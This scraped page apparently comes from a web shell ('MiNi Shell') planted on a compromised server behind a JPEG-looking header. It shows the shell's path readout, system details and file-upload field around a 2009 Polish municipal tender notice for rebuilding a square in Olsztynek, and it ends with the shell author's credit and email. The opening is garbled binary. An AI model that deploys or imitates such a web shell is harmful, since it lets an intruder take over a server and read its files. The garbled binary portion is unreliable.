JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090923/162497-N-2009.html

<p class="kh_header"><b>Olsztynek: Przebudowa placu przy ul. Świerczewskiego w Olsztynku , dz. 299/4</b><br>
<b>Numer ogłoszenia: 162497 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olsztynek reprezentowana przez Burmistrza Olsztynka , ul. Ratusz 1, 11-015 Olsztynek, woj. warmińsko-mazurskie, tel. 089 5192799, 5192705.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa placu przy ul. Świerczewskiego w Olsztynku , dz. 299/4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje:
 	- roboty ziemne - usuwanie humusu					- 175,335m3;
	- rozbiórkę istniejących nawierzchni i chodników placu z obrzeżami          	- 130,00m2 ;
	- rozbiórkę murów z kamienia, konstrukcji betonowych 			 - 30,00m3;
	- wykonanie ogrodzenia z furtką					- 126,00mb;
	- przygotowanie terenu pod wykonanie trawników			- 1160,00m2;
	- montaż elementów parkowych  :
			- ławek parkowych					- 9 szt.;
			- koszty na śmieci					- 4szt.;
			- donic stalowych 					- 3szt.;
			- pergoli stalowej						- 1kpl.;
	- wykonanie nowej nawierzchni chodnika z płyt betonowych gr. 6cm (Starodruk) z korytem, 
	  warstwą odcinającą , podbudową z obrzeżami betonowymi 			- 204,0 m2;
	- budowę przyłącza wodociągowe z rur PE sr.32mm ,40 mm (z uzbrojeniem w zasuwy i 
		studzienki wodomierzowe z wyposażeniem) 				- dł. - 39,5 m;
	-  budowę przyłącza kanalizacji sanitarnej PVC śr. 160 mm z studnią rewizyjna betonowa 
		śr.1200 mm 								- dł. - 67,50m;
	- demontaż i naprawa odcinka jezdni						- 7,00m2;
	- budowa oświetlenia placu rekreacyjnego ( nowoprojektowane lampy - 5szt)  	 - 1kpl.;
	- zabezpieczenia podziemnej infrastruktury telekomunikacyjnej na skrzyżowaniach 
	   z projektowanymi instalacjami wod- kan. geod. 153 				   - 5 mb;
	- wycinka sanitarna drzew							   - 4 szt.;
	- wycinka drzew (kolizje, zmiana zagospodarowania)				   - 2 szt.;
	- wycinka krzewów (kolizje, zmiana zagospodarowania)			                 - 63,6m2,
	- nasadzenia zamienne:
		- drzewa iglaste								   - 3szt.,
		- krzewy liściaste								   - 208 szt.,
		- pnącza  								   - 6szt.

	Drzewa przeznaczone do wycinki sanitarnej numery wg dokumentacji projektowej:
		- nr 10 i 44 - brzozy brodawkowate - 2szt;
		- nr 20 i 33 - drzewa owocowe - 2 szt.
Drzewa przeznaczone do wycinki ze względu na kolizje i zmianę zagospodarowania terenu numery wg dokumentacji projektowej:
		- nr 5 - modrzew europejski - 1 szt.,
		- nr 34 - klon pospolity - 1 szt.,
		- 12, 15, 16, 21, 22, 23, 27, 31, 32, 345, 49 - krzewy - 63,6m2 .
	Wykaz nasadzeń zamiennych:
1. drzewa iglaste - 3szt: 
	  - Picea omorica- świerk serbski - 3szt.
2.	  krzewy liściaste - szt. 208
	  - Berberis th. Aurea - berberys th. żółty 	- 5 szt.
	  - Berberis th. Erecta - berberys th. Erecta - 25 szt.
	  - Cotoneaster radicans Eichholtz - irga rozesłana E. - 75 szt.
	  - Cornus alba Sibirica - dereń biały - 100 szt.
	  - Philadelphus coronarius- jaśminowiec wonny - 3 szt.
3.   pnącza - 6 szt.
	  - Aristolochia durior - kokornak wielkolistny - 2 szt. 
	  - Parthenocissus tricuspidata Veitchi-winobluszcz trójlistkowy- 2 szt.
	  - Lonicera caprifolium - wiciokrzew przewiercień - 2 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.11.12.00-0, 45.23.33.40-4, 45.23.32.60-9, 45.34.20.00-6, 45.11.27.00-2, 45.23.30.00-9, 45.23.13.00-8, 31.52.72.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.  Warunkiem   udziału   w   postępowaniu  jest  wniesienie   wadium   w   wysokości   4.000 złotych 
(cztery tysiące złotych), w terminie do dnia  14 października 2009r. do godz. 12.00.
2. Wadium może być wnoszone w formie określonej w art. 45 ust. 6 Prawo zamówień publicznych, 
przy czym:
-  wadium wnoszone w formie  pieniężnej powinno być  wpłacone na  konto Urzędu Miejskiego w 
Olsztynku   w   Banku   Spółdzielczym   w   Olsztynku,   nr   konta:    33882300072001000001690003.  Na przelewie należy umieścić informację Wadium - przetarg 
- Przebudowa placu przy ul. Świerczewskiego w Olsztynku, dz. 299/4. Kopię wpłaty należy dołączyć do oferty.
Wadium   wnoszone   w   formie:   poręczenia   bankowego,   gwarancji   bankowej   lub   gwarancji ubezpieczeniowej i poręczeniach udzielanych przez podmioty,  należy dołączyć do oferty w formie kopii, natomiast oryginał należy złożyć odrębnie w siedzibie Urzędzie Miejskim w Olsztynku, pokój nr 7, w terminie do dnia  14 października 2009r. do godz. 12:00.  W przypadku wniesienia wadium w  innej formie niż pieniężna, termin ważności dokumentu stwierdzającego zabezpieczenie wadium nie może być krótszy niż termin związania z ofertą. Jeżeli termin ważności (skutecznej realizacji) wadium ujawniony na powyższych dokumentach będzie krótszy to taka oferta będzie odrzucona ze względu na nieskutecznie wniesione wadium.
3. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonym 
terminie znajdzie się na koncie Zamawiającego.
4. Zamawiający zwraca niezwłocznie wadium zgodnie z art. 46 ust. 1 pkt 1-3 ustawy Prawo zamówień 
publicznych, jeżeli:
- upłynął termin związania ofertą -30 dni,
- zawarto   umowę   w   sprawie   zamówienia   publicznego   i   wniesiono   zabezpieczenie                         
  należytego wykonania tej umowy,
- Zamawiający   unieważnił   postępowanie   o   udzielenie   zamówienia,   a   protesty  zostały  
  ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
5. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy zgodnie z art. 46 ust. 2 pkt 1-3 
ustawy Prawo zamówień publicznych :
- który wycofał ofertę przed upływem terminu składania ofert,
- który został wykluczony z postępowania,
- którego oferta została odrzucona.
Złożenie   przez   Wykonawcę,   którego   oferta   została   odrzucona   lub   wykluczona   z   postępowania, wniosku   o   zwrot   wadium   jest   równoznaczne   ze   zrzeczeniem   się   przez   Wykonawcę   prawa   do wniesienia protestu.
6. Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 46 ust. 5 pkt 1-3 ustawy Prawo 
zamówień publicznych, jeżeli Wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w 
  ofercie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po 
  stronie Wykonawcy.
7. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi  
    z umowy   rachunku   bankowego,   na   którym   było   ono   przechowywane,   pomniejszone   o   
    koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek 
    bankowy wskazany przez Wykonawcę.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy:
1) spełniają   warunki   zawarte   w   art.   22   ust.   1   ustawy  z   dnia   29   stycznia   2004   roku   Prawo zamówień  publicznych   (Dz.U.  z  2007  roku Nr  223,  poz.  1655 z  późn.  zm.),   w  tym:   nie podlegają wykluczeniu na podstawie art. 24 tej ustawy.
2) spełnią wymagania dotyczące wadium
3) udzielą gwarancji jakości na wykonane  roboty budowlane na okres 5 lat - licząc od dnia odbioru tych robót
4) przygotują ofertę zgodnie z wymogami zawartymi w niniejszej specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W   celu   potwierdzenia   spełnienia   warunków   udziału   w   postępowaniu   oferta   musi   zawierać następujące dokumenty i oświadczenia:
1. aktualny   odpis   właściwego   rejestru   albo   aktualne   zaświadczenie   o   wpisie   do   ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2. oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na mocy art. 24 ust. 1 i 2   i   spełnia   warunki   określone   w   art.   22   ust.   1   ustawy   Prawo   zamówień   publicznych  -  wg Załącznika nr 2 do SIWZ;
3.   aktualną   informację   z   Krajowego  Rejestru  Karnego,   a   w  przypadku   osób  pochodzących   z innego   kraju   niż   Rzeczpospolita   Polska   -   równoważnego   zaświadczenia   właściwego   organu sądowego lub administracyjnego kraju pochodzenia osoby, w zakresie określonym w art. 24 ust.1 pkt. 4-9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4. zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie 
zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie; odroczenie   lub   rozłożenie   na   raty   zaległych   płatności   lub   wstrzymanie   w   całości   wykonania decyzji organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5.   zaświadczenie   właściwego   Oddziału   Zakładu  Ubezpieczeń  Społecznych   potwierdzające,   że Wykonawca   nie  zalega  z  opłacaniem  składek  na  ubezpieczenie  zdrowotne  lub  społeczne,  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych   płatności   lub   wstrzymanie   w   całości   wykonania   decyzji   organu,   wystawione   nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
6. informację na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu 
kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności 
jest krótszy - w tym okresie = wg wzoru własnego;
7)   wykaz   niezbędnego   do   wykonania   zamówienia   sprzętu   i   urządzeń,   posiadanych   przez Wykonawcę  =   wg   wzoru   własnego.  Wykonawcy   wspólnie   ubiegający   się   o   udzielenie zamówienia potwierdzają, że razem spełniają wymagany warunek;
8. wykaz osób, które będą wykonywać zamówienie, a także zakres wykonywanych przez nich 
czynności,   z   załączonymi   kserokopiami   dokumentów   stwierdzających,   że   osoby   te   posiadają wymagane  uprawnienia budowlane i są wpisane na listę członków właściwej izby samorządu zawodowego  =   wg   wzoru   własnego.  Wykonawcy   wspólnie   ubiegający   się   o   udzielenie zamówienia potwierdzają, że razem spełniają wymagany warunek;
9. wykaz wykonanych w okresie ostatnich pięciu lat (licząc wstecz od dnia składania ofert), a 
jeżeli   okres   prowadzenia   działalności   jest   krótszy   -   w   tym   okresie,   przynajmniej   2   robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane z należytą starannością (potwierdzenia muszą dotyczyć wszystkich wyszczególnionych w wykazie robót i zawierać: okres realizacji, miejsce wykonania, zakres i wartość oraz opinie, rekomendacje itp.)  = wg wzoru własnego.  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  potwierdzają, że razem spełniają ten warunek;
10.   wykaz   części   zamówienia,   której   wykonanie   zamierza   Wykonawca   powierzyć 
podwykonawcom = wg wzoru własnego;
11.  oświadczenie   Wykonawcy   o   znajdowaniu   się   w   sytuacji   ekonomicznej   i   finansowej zapewniającej wykonanie zamówienia = wg wzoru własnego;
12. polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od 
odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej;
13. dokument potwierdzający wniesienie wadium;
14. oświadczenie o udzieleniu gwarancji jakości na wykonane roboty budowlane na okres 5 lat, 
wg wzoru własnego;
15. wypełniony formularz ofertowy - wg Załącznika nr 1 do SIWZ;
16. zaakceptowany   projekt   umowy,   parafowany   na   każdej   zapisanej   stronie   przez   osobę podpisującą ofertę - wg Załącznika nr 3 do SIWZ;
17. kosztorys ofertowy opracowany na podstawie załączonego do SIWZ przedmiaru robót (zał. Nr
      4 do SIWZ),
18. oświadczenie o dokonanej wizji lokalnej terenu budowy i zapoznaniu się z placem budowy 
      oraz wynikających trudności w realizacji inwestycji wynikających z jej lokalizacji, możliwości 
istniejących niezainwentaryzowanych podziemnych sieci i instalacji, konieczności zapewnienia 
dojścia i zapewnienia wody mieszkańcom budynków mieszkalnych Wspólnot Mieszkaniowych Świerczewskiego 26 i 26b w trakcie prowadzenia robót oraz utrudnień wynikających z tego powody dla Wykonawcy - wg wzoru własnego;
19. Pełnomocnictwo   lub   inny   dokument   określający   zakres   umocowania   do   
      reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik lub przedstawiciel Wykonawcy.
20. Wykonawcy wspólnie ubiegający się o zamówienie oprócz złożenia odrębnych dla każdego
Wykonawcy dokumentów( wyżej wymienionych ) zobowiązani są do przedłożenia: dokumentu ustanawiającego pełnomocnictwo do reprezentowania w niniejszym postępowaniu o zamówienie   publiczne   i   zawarcia   umowy   oraz   kopii   umowy   lub   innego   dokumentu potwierdzającego zawarcie konsorcjum/spółki cywilnej, podpisanego przez wszystkich partnerów. 
21. Wykonawca   mający   siedzibę   lub   miejsce   zamieszkania   poza   terytorium   Rzeczypospolitej Polskiej  zobowiązany jest do przedłożenia oświadczeń i dokumentów   ( wyżej wymienionych ) wystawionych w kraju, w którym ma siedzibę lub miejsce zamieszkania.

     Wyżej wymienione dokumenty i oświadczenia muszą być złożone w formie oryginałów 
lub   kserokopii   potwierdzonych   za   zgodność   z   oryginałem   przez   osobę/osoby uprawnioną uprawnione do podpisywania oferty.
Brak   jakiegokolwiek   z   wyżej   wymienionych   dokumentów   lub   złożenie   dokumentu   w niewłaściwej formie  (np.  brak poświadczenia przez  Wykonawcę zgodności  z oryginałem) 
spowoduje  wykluczenie Wykonawcy z postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.olsztynek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 12:00, miejsce: W siedzibie zamawiającego..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com